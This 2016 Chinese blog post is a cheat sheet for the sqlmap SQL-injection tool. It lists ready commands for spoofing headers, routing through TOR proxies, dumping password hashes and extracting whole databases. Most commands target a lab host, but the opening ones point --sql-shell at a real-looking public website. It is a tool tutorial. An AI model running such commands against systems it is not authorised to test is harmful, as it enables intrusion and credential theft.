sqlmap簡單中文說明

apachecn_飛龍發表於2016-02-19
SQL

整理:mickey

更新

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //執行SQL語句
sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //更詳細的資訊

load options from a configuration INI file

sqlmap -c sqlmap.conf

使用POST方法提交

sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData來抓cookies

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

使用referer欺騙

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

使用自定義user-agent,或者使用隨機使用自帶的user-agents.txt

python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

使用基本認證

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

使用Digest認證

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

使用代理,配合TOR

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

使用多執行緒猜解

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

繞過動態檢測,直接指定有注入點的引數,可以使用,分割多個引數,指定user-agent注入

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

指定資料庫,繞過SQLMAP的自動檢測

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"
  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server

指定作業系統,繞過SQLMAP自動檢測

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"
  • Linux
  • Windows

自定義payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=(`" . $_GET[`id`] . "`) LIMIT 0, 1";:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "`" --postfix "AND `test`=`test"
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter `id` with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter `id`
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter `id` is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1`) AND 7433=7433 AND (`test`=`test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=(`1`) AND 7433=7433 AND (`test`=`test`) LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

頁面比較

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[w][w]er" -v

排除網站的內容

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([d]+)"

多語句測試,php內嵌函式mysql_query(),不支援多語句

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

union注入測試

python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

unionz注入配合orderby

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

判斷當前使用者是否是dba

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

列舉資料庫使用者

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0

列舉資料庫使用者密碼

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

檢視使用者許可權

python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

列資料庫

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

列出指定資料庫指定表的列名

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

列出指定資料庫的指定表的指定列的內容

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

指定列的範圍從2-4

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

匯出所有資料庫,所有表的內容

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

只列出使用者自己新建的資料庫和表的內容

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

sql query

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
SELECT usename, passwd FROM pg_shadow ORDER BY usename

儲存和恢復會話

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

儲存選項到INC配置檔案

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save


相關文章